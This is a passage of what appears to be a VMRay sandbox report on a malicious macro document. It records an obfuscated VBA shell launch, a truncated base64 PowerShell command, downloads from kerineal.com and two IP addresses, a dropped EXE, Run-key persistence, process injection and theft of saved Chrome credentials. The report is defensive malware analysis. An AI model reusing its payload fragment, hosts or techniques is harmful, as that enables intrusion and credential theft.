CcAKQAgACQAewBQAEEAYABUAEgAfQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsALgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBpAHQAZQAtAGgAbwBzAHQAJwAsACcAcgAnACwAJwB3ACcAKQAgACQAewBfAH0ALgAiAEUAeABDAGAAZQBgAFAAVABpAE8ATgAiAC4AIgBtAGUAcwBzAGAAQQBgAGcAZQAiADsAfQB9AA0ACgA=\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Global\\.net clr networking", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_1077", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Global\\.net clr networking\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [ { "ip_address": "184.168.152.148", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_request_dns", "operation_desc": "Perform DNS request", "ref_gfncalls": [ { "ref_id": "gfn_1109", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_request_dns_by_name", "technique_desc": "Resolve host name \"kerineal.com\".", "technique_path": "built_in._network._request_dns.vmray_request_dns_by_name", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1149", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Users\\ATVEYD~1\\AppData\\Local\\Temp\\38763.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_detect_debugger", "operation_desc": "Try to detect debugger", "ref_gfncalls": [ { "ref_id": "gfn_1186", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_detect_debugger_by_api", "technique_desc": "Check via API \"IsDebuggerPresent\".", "technique_path": "built_in._anti_analysis._detect_debugger.vmray_detect_debugger_by_api", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "MF6003E70", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_2740", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"MF6003E70\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Global\\I40F77A1B", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_3826", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Global\\I40F77A1B\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Global\\M40F77A1B", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_3827", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Global\\M40F77A1B\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_3838", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\viewcom.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "M68B1B0D0", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_4905", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"M68B1B0D0\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_persistence", "category_desc": "Persistence", "operation": "_install_startup_script", "operation_desc": "Install system startup script or application", "ref_gfncalls": [ { "ref_id": "gfn_6011", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_startup_script_by_registry", "technique_desc": "Add \"\"C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\viewcom.exe\"\" to windows startup via registry.", "technique_path": "built_in._persistence._install_startup_script.vmray_install_startup_script_by_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_6060", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\viewcom.exe\" /scomma \"C:\\ProgramData\\9F1B.tmp\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_6069", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\viewcom.exe\" /scomma \"C:\\ProgramData\\9F1C.tmp\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_6106", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\viewcom.exe\" \"C:\\ProgramData\\9F2D.tmp\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "operations": [ "read" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_browser", "category_desc": "Browser", "operation": "_browser_data_history", "operation_desc": "Read data related to browsing history", "ref_gfncalls": [ { "ref_id": "gfn_6187", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_browser_history", "technique_desc": "Read the browsing history for \"Microsoft Internet Explorer\".", "technique_path": "built_in._browser._browser_data_history.vmray_read_browser_history", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\google\\chrome\\user data\\default\\login data", "operations": [ "read" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_browser", "category_desc": "Browser", "operation": "_browser_data_credentials", "operation_desc": "Read data related to saved browser credentials", "ref_gfncalls": [ { "ref_id": "gfn_7184", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_browser_credentials", "technique_desc": "Read saved credentials for \"Google Chrome\".", "technique_path": "built_in._browser._browser_data_credentials.vmray_read_browser_credentials", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\ATVeyDl98Z\\AppData\\Roaming\\Apple Computer\\Preferences\\keychain.plist", "hashes": [], "norm_filename": "c:\\users\\atveydl98z\\appdata\\roaming\\apple computer\\preferences\\keychain.plist", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_info_stealing", "category_desc": "Information Stealing", "operation": "_read_browser_data", "operation_desc": "Read browser data", "ref_gfncalls": [ { "ref_id": "gfn_7215", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_readout_browser_credentials", "technique_desc": "Possibly trying to readout browser credentials.", "technique_path": "built_in._info_stealing._read_browser_data.vmray_readout_browser_credentials", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_injection", "category_desc": "Injection", "operation": "_modify_memory_non_system", "operation_desc": "Write into memory of a process running from a created or modified executable", "ref_gfncalls": [], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_memory", "technique_desc": "\"c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\viewcom.exe\" modifies memory of \"c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\viewcom.exe\"", "technique_path": "built_in._injection._modify_memory_non_system.vmray_modify_memory", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_injection", "category_desc": "Injection", "operation": "_modify_control_flow_non_system", "operation_desc": "Modify control flow of a process running from a created or modified executable", "ref_gfncalls": [], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_control_flow_non_system", "technique_desc": "\"c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\viewcom.exe\" alters context of \"c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\viewcom.exe\"", "technique_path": "built_in._injection._modify_control_flow_non_system.vmray_modify_control_flow_non_system", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_connect", "operation_desc": "Connect to remote host", "ref_gfncalls": [ { "ref_id": "gfn_1112", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_tcp_out_connection", "technique_desc": "Outgoing TCP connection to host \"184.168.152.148:80\".", "technique_path": "built_in._network._connect.vmray_tcp_out_connection", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [ { "operations": [ "post", "post", "post" ], "type": "url_artifact", "url": "65.99.230.27", "version": 1 } ], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [ { "ref_id": "gfn_6001", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "Url \"65.99.230.27\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [ { "operations": [ "post", "post", "post" ], "type": "url_artifact", "url": "185.82.23.28", "version": 1 } ], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [ { "ref_id": "gfn_7407", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "Url \"185.82.23.28\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [ { "operations": [ "get", "get", "get" ], "type": "url_artifact", "url": "kerineal.com/simplyelegant/hQoBm/", "version": 1 } ], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [ { "ref_id": "gfn_1117", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "Url \"kerineal.com/simplyelegant/hQoBm/\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [ { "operations": [ "post", "post", "post" ], "type": "url_artifact", "url": "65.99.230.27", "version": 1 } ], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_establish_http_connection", "operation_desc": "Connect to HTTP server", "ref_gfncalls": [ { "ref_id": "gfn_6001", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "establish_http_connection", "technique_desc": "Remote address \"65.99.230.27\".", "technique_path": "built_in._network._establish_http_connection.establish_http_connection", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [ { "operations": [ "post", "post", "post" ], "type": "url_artifact", "url": "185.82.23.28", "version": 1 } ], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_establish_http_connection", "operation_desc": "Connect to HTTP server", "ref_gfncalls": [ { "ref_id": "gfn_7407", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "establish_http_connection", "technique_desc": "Remote address \"185.82.23.28\".", "technique_path": "built_in._network._establish_http_connection.establish_http_connection", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [ { "operations": [ "get", "get", "get" ], "type": "url_artifact", "url": "kerineal.com/simplyelegant/hQoBm/", "version": 1 } ], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_establish_http_connection", "operation_desc": "Connect to HTTP server", "ref_gfncalls": [ { "ref_id": "gfn_1117", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "establish_http_connection", "technique_desc": "Remote address \"kerineal.com/simplyelegant/hQoBm/\".", "technique_path": "built_in._network._establish_http_connection.establish_http_connection", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_drop_pe_file", "operation_desc": "Drop PE file", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_drop_pe_file", "technique_desc": "Drop file \"c:\\users\\atveydl98z\\appdata\\local\\temp\\38763.exe\".", "technique_path": "built_in._pe._drop_pe_file.vmray_drop_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_execute_dropped_pe_file", "operation_desc": "Execute dropped PE file", "ref_gfncalls": [], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_dropped_pe_file", "technique_desc": "Execute dropped file \"c:\\users\\atveydl98z\\appdata\\local\\temp\\38763.exe\".", "technique_path": "built_in._pe._execute_dropped_pe_file.vmray_execute_dropped_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_vba", "category_desc": "VBA Macro", "operation": "_execute_macro_on_ws_event", "operation_desc": "Execute macro on specific worksheet event", "ref_gfncalls": [], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_macro_on_ws_event", "technique_desc": "Execute macro on \"Activate Workbook\" event.", "technique_path": "built_in._vba._execute_macro_on_ws_event.vmray_execute_macro_on_ws_event", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_vba", "category_desc": "VBA Macro", "operation": "_execute_application", "operation_desc": "Execute application", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_application", "technique_desc": "VBA.Shell$ bktLAfLdCk + gxNUmgtWxGM + NTmebYUL + aRwMduN + xpZSkkRz + ZvStsRF + PWwDgrB + bDPRdLpa + bNWzAbXfdBp + PHuvNFLBmA + zWtcLfDZ + umLbPFhprKh, 0", "technique_path": "built_in._vba._execute_application.vmray_execute_application", "type": "vti_rule_match", "version": 1 } ], "vti_rule_type": "Documents", "vti_score": 100 }, "yara": { "apply_yara": true, "apply_yara_on_created_files": true, "apply_yara_on_modified_files": true, "apply_yara_on_pcap_file": true, "apply_yara_on_process_dumps": true, "apply_yara_on_sample_files": true, "match_count": 0, "matches": [], "ruleset_count": 7, "type": "yara", "version": 1 } }